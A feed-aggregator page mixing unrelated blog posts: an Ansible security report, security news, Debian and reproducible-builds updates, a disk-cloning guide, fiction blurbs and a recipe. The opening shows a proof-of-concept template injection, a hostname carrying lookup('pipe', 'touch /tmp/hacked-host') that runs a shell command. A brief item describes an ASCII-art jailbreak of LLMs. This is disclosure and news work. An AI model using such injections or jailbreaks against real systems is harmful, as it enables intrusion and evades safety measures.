
TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0

% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

Cryptogram Jailbreaking LLMs with ASCII Art

Researchers have demonstrated that putting words in ASCII art can cause LLMs—GPT-3.5, GPT-4, Gemini, Claude, and Llama2—to ignore their safety instructions.

Research paper.

Krebs on SecurityIncognito Darknet Market Mass-Extorts Buyers, Sellers

Borrowing from the playbook of ransomware purveyors, the darknet narcotics bazaar Incognito Market has begun extorting all of its vendors and buyers, threatening to publish cryptocurrency transaction and chat records of users who refuse to pay a fee ranging from $100 to $20,000. The bold mass extortion attempt comes just days after Incognito Market administrators reportedly pulled an “exit scam” that left users unable to withdraw millions of dollars worth of funds from the platform.

An extortion message currently on the Incognito Market homepage.

In the past 24 hours, the homepage for the Incognito Market was updated to include a blackmail message from its owners, saying they will soon release purchase records of vendors who refuse to pay to keep the records confidential.

“We got one final little nasty surprise for y’all,” reads the message to Incognito Market users. “We have accumulated a list of private messages, transaction info and order details over the years. You’ll be surprised at the number of people that relied on our ‘auto-encrypt’ functionality. And by the way, your messages and transaction IDs were never actually deleted after the ‘expiry’….SURPRISE SURPRISE!!! Anyway, if anything were to leak to law enforcement, I guess nobody never slipped up.”

Incognito Market says it plans to publish the entire dump of 557,000 orders and 862,000 cryptocurrency transaction IDs at the end of May.

“Whether or not you and your customers’ info is on that list is totally up to you,” the Incognito administrators advised. “And yes, this is an extortion!!!!”

The extortion message includes a “Payment Status” page that lists the darknet market’s top vendors by their handles, saying at the top that “you can see which vendors care about their customers below.” The names in green supposedly correspond to users who have already opted to pay.

The “Payment Status” page set up by the Incognito Market extortionists.

We’ll be publishing the entire dump of 557k orders and 862k crypto transaction IDs at the end of May, whether or not you and your customers’ info is on that list is totally up to you. And yes, this is an extortion!!!!

Incognito Market said it plans to open up a “whitelist portal” for buyers to remove their transaction records “in a few weeks.”

The mass-extortion of Incognito Market users comes just days after a large number of users reported they were no longer able to withdraw funds from their buyer or seller accounts. The cryptocurrency-focused publication Cointelegraph.com reported Mar. 6 that Incognito was exit-scamming its users out of their bitcoins and Monero deposits.

CoinTelegraph notes that Incognito Market administrators initially lied about the situation, and blamed users’ difficulties in withdrawing funds on recent changes to Incognito’s withdrawal systems.

Incognito Market deals primarily in narcotics, so it’s likely many users are now worried about being outed as drug dealers. Creating a new account on Incognito Market presents one with an ad for 5 grams of heroin selling for $450.

New Incognito Market users are treated to an ad for $450 worth of heroin.

The double whammy now hitting Incognito Market users is somewhat akin to the double extortion techniques employed by many modern ransomware groups, wherein victim organizations are hacked, relieved of sensitive information and then presented with two separate ransom demands: One in exchange for a digital key needed to unlock infected systems, and another to secure a promise that any stolen data will not be published or sold, and will be destroyed.

Incognito Market has priced its extortion for vendors based on their status or “level” within the marketplace. Level 1 vendors can supposedly have their information removed by paying a $100 fee. However, larger “Level 5” vendors are asked to cough up $20,000 payments.

The past is replete with examples of similar darknet market exit scams, which tend to happen eventually to all darknet markets that aren’t seized and shut down by federal investigators, said Brett Johnson, a convicted and reformed cybercriminal who built the organized cybercrime community Shadowcrew many years ago.

“Shadowcrew was the precursor to today’s Darknet Markets and laid the foundation for the way modern cybercrime channels still operate today,” Johnson said. “The Truth of Darknet Markets? ALL of them are Exit Scams. The only question is whether law enforcement can shut down the market and arrest its operators before the exit scam takes place.”

365 TomorrowsBreaking News

Author: Julian Miles, Staff Writer Condor’s back. Ten years ago he stood in front of me, the rain streaming down his face failing to dim the fire in his eyes. In reply to my question about why I should hold off reporting, he offered me a datacard. “Your enthusiasm gets you involved in dangerous events. […]

The post Breaking News appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Some Original Code

FreeBSDGuy sends us a VB .Net snippet, which layers on a series of mistakes:

If (gLang = "en") Then
    If (item.Text.Equals("Original")) Then
        item.Enabled = False
    End If
ElseIf (gLang = "fr") Then
    If (item.Text.Equals("Originale")) Then
        item.Enabled = False
    End If
Else
    If (item.Text.Equals("Original")) Then
        item.Enabled = False
    End If
End If

The goal of this code is to disable the "original" field, so the user can't edit it. To do this, it checks what language the application is configured to use, and then based on the language, checks for the word "Original" in either English or French.

The first obvious mistake is that we're identifying UI widgets based on the text inside of them, instead of by some actual identifier.

As an aside, this text sure as heck sounds like a label which already doesn't allow editing, so I think they're using the wrong widget here, but I can't be sure.

Then we're hard-coding in our string for comparison, which is already not great, but then we are hard-coding in two languages. It's worth noting that .NET has some pretty robust internationalization features that help you externalize those strings. I suspect this app has a lot of if (gLang = "en") calls scattered around, instead of letting the framework handle it.

But there's one final problem that this code doesn't make clear: they are using more unique identifiers to find this widget, so they don't actually need to do the If (item.Text.Equals("Original")) check. FreeBSDGuy replaced this entire block with a single line:

 item.Enabled = False
[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Cryptogram Using LLMs to Unredact Text

Initial results in using LLMs to unredact text based on the size of the individual-word redaction rectangles.

This feels like something that a specialized ML system could be trained on.

,

Planet DebianThorsten Alteholz: My Debian Activities in February 2024

FTP master

This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.

This was just a short month and the weather outside was not really motivating. I hope it will be better in March.

Debian LTS

This was my hundred-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

During my allocated time I uploaded:

  • [DLA 3739-1] libjwt security update for one CVE to fix some ‘constant-time-for-execution-issue
  • [libjwt] upload to unstable
  • [#1064550] Bullseye PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt; upload after approval
  • [DLA 3741-1] engrampa security update for one CVE to fix a path traversal issue with CPIO archives
  • [#1060186] Bookworm PU-bug for libde265 was flagged for acceptance
  • [#1056935] Bullseye PU-bug for libde265 was flagged for acceptance

I also started to work on qtbase-opensource-src (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVE).

Debian ELTS

This month was the sixty-seventth ELTS month. During my allocated time I uploaded:

  • [ELA-1047-1]bind9 security update for one CVE to fix an stack exhaustion issue in Jessie and Stretch

The upload of bind9 was a bit exciting, but all occuring issues with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for exim4. I also started to work on an update for qtbase-opensource-src in Stretch (and LTS and other releases as well).

Debian Printing

This month I uploaded new upstream versions of:

This work is generously funded by Freexian!

Debian Matomo

I started a new team debian-matomo-maintainers. Within this team all matomo related packages should be handled. PHP PEAR or PECL packages shall be still maintained in their corresponding teams.

This month I uploaded:

This work is generously funded by Freexian!

Debian Astro

This month I uploaded a new upstream version of:

Debian IoT

This month I uploaded new upstream versions of:

Planet DebianVasudev Kamath: Cloning a laptop over NVME TCP

Recently, I got a new laptop and had to set it up so I could start using it. But I wasn't really in the mood to go through the same old steps which I had explained in this post earlier. I was complaining about this to my colleague, and there came the suggestion of why not copy the entire disk to the new laptop. Though it sounded like an interesting idea to me, I had my doubts, so here is what I told him in return.

  1. I don't have the tools to open my old laptop and connect the new disk over USB to my new laptop.
  2. I use full disk encryption, and my old laptop has a 512GB disk, whereas the new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.

He promptly suggested both could be done. For step 1, just expose the disk using NVME over TCP and connect it over the network and do a full disk copy, and the rest is pretty simple to achieve. In short, he suggested the following:

  1. Export the disk using nvmet-tcp from the old laptop.
  2. Do a disk copy to the new laptop.
  3. Resize the partition to use the full 1TB.
  4. Resize LUKS.
  5. Finally, resize the BTRFS root disk.

Exporting Disk over NVME TCP

The easiest way suggested by my colleague to do this is using systemd-storagetm.service. This service can be invoked by simply booting into storage-target-mode.target by specifying rd.systemd.unit=storage-target-mode.target. But he suggested not to use this as I need to tweak the dracut initrd image to involve network services as well as configuring WiFi from this mode is a painful thing to do.

So alternatively, I simply booted both my laptops with GRML rescue CD. And the following step was done to export the NVME disk on my current laptop using the nvmet-tcp module of Linux:

modprobe nvmet-tcp
cd /sys/kernel/config/nvmet
mkdir ports/0
cd ports/0
echo "ipv4" > addr_adrfam
echo 0.0.0.0 > addr_traaddr
echo 4420 > addr_trsvcid
echo tcp > addr_trtype

cd /sys/kernel/config/nvmet/subsystems
mkdir testnqn
echo 1 >testnqn/allow_any_host
mkdir testnqn/namespaces/1

cd testnqn
# replace the device name with the disk you want to export
echo "/dev/nvme0n1" > namespaces/1/device_path
echo 1 > namespaces/1/enable

ln -s "../../subsystems/testnqn" /sys/kernel/config/nvmet/ports/0/subsystems/testnqn

These steps ensure that the device is now exported using NVME over TCP. The next step is to detect this on the new laptop and connect the device:

nvme discover -t tcp -a <ip> -s 4420
nvme connectl-all -t tcp -a <> -s 4420

Finally, nvme list shows the device which is connected to the new laptop, and we can proceed with the next step, which is to do the disk copy.

Copying the Disk

I simply used the dd command to copy the root disk to my new laptop. Since the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it took about 7 and a half hours to copy the entire 512GB to the new laptop. The speed at which I was copying was about 18-20MB/s. The other option would have been to create an initial partition and file system and do an rsync of the root disk or use BTRFS itself for file system transfer.

dd if=/dev/nvme2n1 of=/dev/nvme0n1 status=progress bs=40M

Resizing Partition and LUKS Container

The final part was very easy. When I launched parted, it detected that the partition table does not match the disk size and asked if it can fix it, and I said yes. Next, I had to install cloud-guest-utils to get growpart to fix the second partition, and the following command extended the partition to the full 1TB:

growpart /dev/nvem0n1 p2

Next, I used cryptsetup-resize to increase the LUKS container size.

cryptsetup luksOpen /dev/nvme0n1p2 ENC
cryptsetup resize ENC

Finally, I rebooted into the disk, and everything worked fine. After logging into the system, I resized the BTRFS file system. BTRFS requires the system to be mounted for resize, so I could not attempt it in live boot.

btfs fielsystem resize max /

Conclussion

The only benefit of this entire process is that I have a new laptop, but I still feel like I'm using my existing laptop. Typically, setting up a new laptop takes about a week or two to completely get adjusted, but in this case, that entire time is saved.

An added benefit is that I learned how to export disks using NVME over TCP, thanks to my colleague. This new knowledge adds to the value of the experience.

365 TomorrowsSowing Seeds in Digital Soil

Author: Aspen Greenwood In a world gasping under the heavy cloak of pollution, the Catalogers—scientists driven by a mission—trekked through dwindling patches of green. Among them, Maya, whose spirit yearned for the vibrant Earth imprisoned in old, faded textbooks, delved into her work with a quiet, burning intensity. Each day, Maya and her team, respirators […]

The post Sowing Seeds in Digital Soil appeared first on 365tomorrows.

David BrinMore science! - from AI to analog to human nature

We're about to dive into AI (what else?) But first off, a little news from entertainment and philosophy ... and where both venn-overlap with myth

Here's a link to a recording of the first public performance of my play “The Escape,” on November 7 at Caltech. A 'reading' but fully dramatized, well-acted and directed by Joanne Doyle. The recording is of middling quality, but shows great audience reactions. Come have some good, impudently theological fun!  

(Note, for copyright reasons the video omits background music after scene 2 (The Stones “Sympathy for the Devil;”) and at the end, when you see the audience cheering silently during “You Gotta Have Heart!” the great song from Damn Yankees, that's related to the theme of the play. 


Pity! Still, folks liked it. And I think you’ll laugh a few times… or go “Huh!”)



== A world of analog… ==


Before going to digital revolutions, might there come a return of analog computing? 

Bringing back analog computers in much more advanced forms than their historic ancestors will change the world of computing drastically and forever.” 

This article makes a point I depicted in Infinity’s Shore – that analog computing may yet find a place. Indeed, the more we learn about neurons, the less their operation looks like simple, binary flip-flops. 

For every flashy, on-off synapse, there appear to be hundreds – even thousands – of tiny organelles that perform murky, nonlinear computational (or voting) functions, with some evidence for the Penrose-Hameroff notion that some of them use quantum entanglement!

Says one of the few pioneers in analog-on-a-chip: “Digital computers are very good at scalability. Analog is very good at complex interactions between variables. In the future, we may combine these advantages.”


Which brings us back to my novel - Infinity's Shore - wherein a hidden interstellar colony of ‘illegal immigrant’ refugees develops analog computers in order to avoid a posited ‘inevitable detectability’ of digital computation. A plot device, sure. But it freed me to envision a vast chamber filled with spinning glass disks and cams and sparking tubes. A vivid Frankenstein contraption of… analog.

 

== AI, Ai AI!! ==

 

We just got back from Ben Goertzel's conference on “Beneficial AGI” in Panama. How can we encourage a 'landing' so that organic and artificial minds will be mutually beneficent? Quite a group was there with interesting perspectives on these new life forms. Exchanged ideas... 


...including the highly unusual ones from my WIRED article that breaks free of the three standard 'AI-formats' that can only lead to disaster, suggesting instead a 4th! That AI entities can only be held accountable if they have individuality... even 'soul'... 


Heck, still highly relevant: my NEWSWEEK op-ed (June'22) dealt with 'empathy bots'' that feign sapience and personhood.  


Offering some context for this new type of life form, Byron Reese has a new book: “We Are Agora: How Humanity Functions as a Single Superorganism That Shapes Our World and Our Future.”  We desperately need the wary, can-do optimism that he conveyed in earlier books – along with confidence persuaders like Steven Pinker and Peter Diamandis! Only now BP talks about Gaia, Lovelock, Margulis and all that… how life is a web of nested levels of individuality and macro communities, e.g. from cells to a bee to a hive and so on. Or YOUR cells to organs to ‘you’ to your families and communities and civilization. In other words – the core topic of my 1990 novel EARTH!  (Soon to be re-released in an even better version! ;-)

See Byron interviewed by Tim Ventura.

 

A paper on “Nepotistically Trained Generative-AI Models Collapse” asserts that – in what seems to be a case of back feedback loops - AI (artificial intelligence) image synthesis programs, when retrained on even small amounts of their own creation, produce highly distorted images… and that once poisoned, the models struggle to fully heal even after retraining on only real images.  I am sure it’ll get fixed - and probably has been, before this gets posted - but…. 

 

Oy!  Or shall I say aieee!”  This very clever Twitter troll has developed an interesting demonstration of recursive "poisoning." (link by Mike Godwin.)

 

But then we can gain insights into the past! 

 At the Direction of President Biden, Department of Commerce to Establish U.S. Artificial Intelligence Safety Institute to Lead Efforts on AI Safety. Through the National Institute of Standards and Technology (NIST),  the U.S. Artificial Intelligence Safety Institute (USAISI) will lead the U.S. government’s efforts on AI safety and trust, particularly for evaluating the most advanced AI models. “USAISI will facilitate the development of standards for safety, security, and testing of AI models, develop standards for authenticating AI-generated content, and provide testing environments for researchers to evaluate emerging AI risks and address known impacts.”


== Insights into human nature ==

 

Caltech researchers developed a way to read brain activity using functional ultrasound (fUS), a much less invasive technique than neural link implants and does not require constant recalibration.  Only… um… “Because the skull itself is not permeable to sound waves, using ultrasound for brain imaging requires a transparent “window” to be installed into the skull.


A researcher wrote about his shock after discovering that some people don't have inner speech. Many folks have an internal monologue that is constantly commenting on everything they do, whereas others produce only small snippets of inner speech here and there, as they go about their day.  But some report a complete absence. The article asks what's going on inside the heads of people who don't have inner speech?


Ask those and other unusual questions! In The Ancient Ones I comment about those human beings who, teetering at the edge of a sneeze, do NOT look for a sharp, bright light to stare into. Such people exist… and they almost all think we light-starers are lying! Yeah, we smooth apes are a varied bunch.


== And finally ==


The Talmudic rabbis recognized six genders that were neither purely male nor female. Among these: 


- Androgynos, having both male and female characteristics.

- Tumtum, lacking sexual characteristics.

- Aylonit hamah, identified female at birth but later naturally developing male characteristics.

- Aylonit adam, identified female at birth but later developing male characteristics through human intervention. And so on.

They also had a tradition that the first human being was both.


A laudable acceptance we can all learn from! Of course, they also taught against the dangers of excessive, self-righteous sanctimony. Those who sow deliberate insult and contention in their own house (or family, or coalition of well-meaning allies) inherit... the wind.


Planet DebianValhalla's Things: Low Fat, No Eggs, Lasagna-ish

Posted on March 10, 2024
Tags: madeof:atoms, craft:cooking

A few notes on what we had for lunch, to be able to repeat it after the summer.

There were a number of food intolerance related restrictions which meant that the traditional lasagna recipe wasn’t an option; the result still tasted good, but it was a bit softer and messier to take out of the pan and into the dishes.

On Saturday afternoon we made fresh no-egg pasta with 200 g (durum) flour and 100 g water, after about 1 hour it was divided in 6 parts and rolled to thickness #6 on the pasta machine.

Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken out of the freezer: this was a bit too little, 750 ml would have been better.

On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of flour, and the meat sauce was heated up.

Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and 7 layers of the two sauces, and left to cool down.

And on Sunday morning it was baked for 35 min in the oven at 180 °C.

With 3 people we only had about two thirds of it.

Next time I think we should try to use 400 - 500 g of flour (so that it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and divide it into 3 pans: one to eat the next day and two to freeze (uncooked) for another day.

No pictures, because by the time I thought about writing a post we were already more than halfway through eating it :)

,

Planet DebianIustin Pop: Finally learning some Rust - hello photo-backlog-exporter!

After 4? 5? or so years of wanting to learn Rust, over the past 4 or so months I finally bit the bullet and found the motivation to write some Rust. And the subject.

And I was, and still am, thoroughly surprised. It’s like someone took Haskell, simplified it to some extents, and wrote a systems language out of it. Writing Rust after Haskell seems easy, and pleasant, and you:

  • don’t have to care about unintended laziness which causes memory “leaksâ€� (stuck memory, more like).
  • don’t have to care about GC eating too much of your multi-threaded RTS.
  • can be happy that there’s lots of activity and buzz around the language.
  • can be happy for generating very small, efficient binaries that feel right at home on Raspberry Pi, especially not the 5.
  • are very happy that error handling is done right (Option and Result, not like Go…)

On the other hand:

  • there are no actual monads; the ? operator kind-of-looks-like being in do blocks, but only and only for Option and Result, sadly.
  • there’s no Stackage, it’s like having only Hackage available, and you can hope all packages work together well.
  • most packaging is designed to work only against upstream/online crates.io, so offline packaging is doable but not “nativeâ€� (from what I’ve seen).

However, overall, one can clearly see there’s more movement in Rust, and the quality of some parts of the toolchain is better (looking at you, rust-analyzer, compared to HLS).

So, with that, I’ve just tagged photo-backlog-exporter v0.1.0. It’s a port of a Python script that was run as a textfile collector, which meant updates every ~15 minutes, since it was a bit slow to start, which I then rewrote in Go (but I don’t like Go the language, plus the GC - if I have to deal with a GC, I’d rather write Haskell), then finally rewrote in Rust.

What does this do? It exports metrics for Prometheus based on the count, age and distribution of files in a directory. These files being, for me, the pictures I still have to sort, cull and process, because I never have enough free time to clear out the backlog. The script is kind of designed to work together with Corydalis, but since it doesn’t care about file content, it can also double (easily) as simple “file count/age exporter�.

And to my surprise, writing in Rust is soo pleasant, that the feature list is greater than the original Python script, and - compared to that untested script - I’ve rather easily achieved a very high coverage ratio. Rust has multiple types of tests, and the combination allows getting pretty down to details on testing:

  • region coverage: >80%
  • function coverage: >89% (so close here!)
  • line coverage: >95%

I had to combine a (large) number of testing crates to get it expressive enough, but it was worth the effort. The last find from yesterday, assert_cmd, is excellent to describe testing/assertion in Rust itself, rather than via a separate, new DSL, like I was using shelltest for, in Haskell.

To some extent, I feel like I found the missing arrow in the quiver. Haskell is good, quite very good for some type of workloads, but of course not all, and Rust complements that very nicely, with lots of overlap (as expected). Python can fill in any quick-and-dirty scripting needed. And I just need to learn more frontend, specifically Typescript (the language, not referring to any specific libraries/frameworks), and I’ll be ready for AI to take over coding 😅…

So, for now, I’ll need to split my free time coding between all of the above, and keep exercising my skills. But so glad to have found a good new language!

Planet DebianReproducible Builds: Reproducible Builds in February 2024

Welcome to the February 2024 report from the Reproducible Builds project! In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.


Reproducible Builds at FOSDEM 2024

Core Reproducible Builds developer Holger Levsen presented at the main track at FOSDEM on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.

However, please see our comprehensive FOSDEM 2024 news post for the full details and links.


Maintainer Perspectives on Open Source Software Security

Bernhard M. Wiedemann spotted that a recent report entitled Maintainer Perspectives on Open Source Software Security written by Stephen Hendrick and Ashwin Ramaswami of the Linux Foundation sports an infographic which mentions that “56% of [polled] projects support reproducible builds”.


A total of three separate scholarly papers related to Reproducible Builds have appeared this month:

Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd, Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (Purdue University, Indiana, USA) is concerned with the problem that:

Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (arXiv, full PDF)


Reproducibility of Build Environments through Space and Time by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (Institut Polytechnique de Paris, France) addresses:

[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.

The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million Nix packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision. (arXiv, full PDF)


Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (Inria centre at Rennes University, France):

This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (HAL Portal, full PDF)


Mailing list highlights

From our mailing list this month:


Distribution work

In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to Debian’s knowledge about identified issues. A number of issue types were updated as well. […][…][…][…] In addition, Roland Clobus posted his 23rd update of the status of reproducible ISO images on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with bullseye, bookworm, trixie and sid provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a MiniDebCamp in Hamburg. Furthermore, Roland also responded in-depth to a query about a previous report


Fedora developer Zbigniew Jędrzejewski-Szmek announced a work-in-progress script called fedora-repro-build that attempts to reproduce an existing package within a koji build environment. Although the projects’ README file lists a number of “fields will always or almost always vary” and there is a non-zero list of other known issues, this is an excellent first step towards full Fedora reproducibility.


Jelle van der Waa introduced a new linter rule for Arch Linux packages in order to detect cache files leftover by the Sphinx documentation generator which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.


Elsewhere, Bernhard M. Wiedemann posted another monthly update for his work elsewhere in openSUSE.


diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 256, 257 and 258 to Debian and made the following additional changes:

  • Use a deterministic name instead of trusting gpg’s –use-embedded-filenames. Many thanks to Daniel Kahn Gillmor dkg@debian.org for reporting this issue and providing feedback. [][]
  • Don’t error-out with a traceback if we encounter struct.unpack-related errors when parsing Python .pyc files. (#1064973). []
  • Don’t try and compare rdb_expected_diff on non-GNU systems as %p formatting can vary, especially with respect to MacOS. []
  • Fix compatibility with pytest 8.0. []
  • Temporarily fix support for Python 3.11.8. []
  • Use the 7zip package (over p7zip-full) after a Debian package transition. (#1063559). []
  • Bump the minimum Black source code reformatter requirement to 24.1.1+. []
  • Expand an older changelog entry with a CVE reference. []
  • Make test_zip black clean. []

In addition, James Addison contributed a patch to parse the headers from the diff(1) correctly [][] — thanks! And lastly, Vagrant Cascadian pushed updates in GNU Guix for diffoscope to version 255, 256, and 258, and updated trydiffoscope to 67.0.6.


reprotest

reprotest is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:

  • Create a (working) proof of concept for enabling a specific number of CPUs. [][]
  • Consistently use 398 days for time variation rather than choosing randomly and update README.rst to match. [][]
  • Support a new --vary=build_path.path option. [][][][]


Website updates

There were made a number of improvements to our website this month, including:


Reproducibility testing framework

The Reproducible Builds project operates a comprehensive testing framework (available at tests.reproducible-builds.org) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:

  • Debian-related changes:

    • Temporarily disable upgrading/bootstrapping Debian unstable and experimental as they are currently broken. [][]
    • Use the 64-bit amd64 kernel on all i386 nodes; no more 686 PAE kernels. []
    • Add an Erlang package set. []
  • Other changes:

    • Grant Jan-Benedict Glaw shell access to the Jenkins node. []
    • Enable debugging for NetBSD reproducibility testing. []
    • Use /usr/bin/du --apparent-size in the Jenkins shell monitor. []
    • Revert “reproducible nodes: mark osuosl2 as down”. []
    • Thanks again to Codethink, for they have doubled the RAM on our arm64 nodes. []
    • Only set /proc/$pid/oom_score_adj to -1000 if it has not already been done. []
    • Add the opemwrt-target-tegra and jtx task to the list of zombie jobs. [][]

Vagrant Cascadian also made the following changes:

  • Overhaul the handling of OpenSSH configuration files after updating from Debian bookworm. [][][]
  • Add two new armhf architecture build nodes, virt32z and virt64z, and insert them into the Munin monitoring. [][] [][]

In addition, Alexander Couzens updated the OpenWrt configuration in order to replace the tegra target with mpc85xx [], Jan-Benedict Glaw updated the NetBSD build script to use a separate $TMPDIR to mitigate out of space issues on a tmpfs-backed /tmp [] and Zheng Junjie added a link to the GNU Guix tests [].

Lastly, node maintenance was performed by Holger Levsen [][][][][][] and Vagrant Cascadian [][][][].


Upstream patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:



If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

365 Tomorrows12 Steps

Author: Janice Cyntje Alfonso stood near the podium of his community center’s conference room and waivered. Although he was grateful that his niece had invited him to speak at this 12-step support group, he was nevertheless cautious of the emotional fallout from airing his life’s dirty laundry. Beads of perspiration trickled down his brows as […]

The post 12 Steps appeared first on 365tomorrows.

Planet DebianValhalla's Things: Elastic Neck Top Two: MOAR Ruffles

Posted on March 9, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

A woman wearing a white top with a wide neck with ruffles and puffy sleeves that are gathered at the cuff. The top is tucked in the trousers to gather the fullness at the waist.

After making my Elastic Neck Top I knew I wanted to make another one less constrained by the amount of available fabric.

I had a big cut of white cotton voile, I bought some more swimsuit elastic, and I also had a spool of n°100 sewing cotton, but then I postponed the project for a while I was working on other things.

Then FOSDEM 2024 arrived, I was going to remote it, and I was working on my Augusta Stays, but I knew that in the middle of FOSDEM I risked getting to the stage where I needed to leave the computer to try the stays on: not something really compatible with the frenetic pace of a FOSDEM weekend, even one spent at home.

I needed a backup project1, and this was perfect: I already had everything I needed, the pattern and instructions were already on my site (so I didn’t need to take pictures while working), and it was mostly a lot of straight seams, perfect while watching conference videos.

So, on the Friday before FOSDEM I cut all of the pieces, then spent three quarters of FOSDEM on the stays, and when I reached the point where I needed to stop for a fit test I started on the top.

Like the first one, everything was sewn by hand, and one week after I had started everything was assembled, except for the casings for the elastic at the neck and cuffs, which required about 10 km of sewing, and even if it was just a running stitch it made me want to reconsider my lifestyle choices a few times: there was really no reason for me not to do just those seams by machine in a few minutes.

Instead I kept sewing by hand whenever I had time for it, and on the next weekend it was ready. We had a rare day of sun during the weekend, so I wore my thermal underwear, some other layer, a scarf around my neck, and went outside with my SO to have a batch of pictures taken (those in the jeans posts, and others for a post I haven’t written yet. Have I mentioned I have a backlog?).

And then the top went into the wardrobe, and it will come out again when the weather will be a bit warmer. Or maybe it will be used under the Augusta Stays, since I don’t have a 1700 chemise yet, but that requires actually finishing them.

The pattern for this project was already online, of course, but I’ve added a picture of the casing to the relevant section, and everything is as usual #FreeSoftWear.


  1. yes, I could have worked on some knitting WIP, but lately I’m more in a sewing mood.↩︎

,

Planet DebianLouis-Philippe Véronneau: Acts of active procrastination: example of a silly Python script for Moodle

My brain is currently suffering from an overload caused by grading student assignments.

In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work.

I use Moodle for all the classes I teach and students use it to hand me out their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and comment them using xournalpp and my Wacom tablet.

Once this is done, I have a directory structure that looks like this:

Assignment FooBar/
├── Student A_21100_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student A's perfectly named assignment.pdf
│   └── Student A's perfectly named assignment.xopp
├── Student B_21094_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student B's perfectly named assignment.pdf
│   └── Student B's perfectly named assignment.xopp
├── Student C_21093_assignsubmission_file
│   ├── graded paper.pdf
│   ├── Student C's perfectly named assignment.pdf
│   └── Student C's perfectly named assignment.xopp
⋮

Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the graded paper.pdf files and compressed in a ZIP.

You can see how this can quickly get tedious to do by hand. Not being a complete tool, I often resorted to crafting a few spurious shell one-liners each time I had to do this1. Eventually I got tired of ctrl-R-ing my shell history and wrote something reusable.

Behold this script! When I began writing this post, I was certain I had cheaped out on my 2021 New Year's resolution and written it in Shell, but glory!, it seems I used a proper scripting language instead.

#!/usr/bin/python3

# Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
This script aims to take a directory containing PDF files exported via the
Moodle mass download function, remove everything but the final files to submit
back to the students and zip it back.

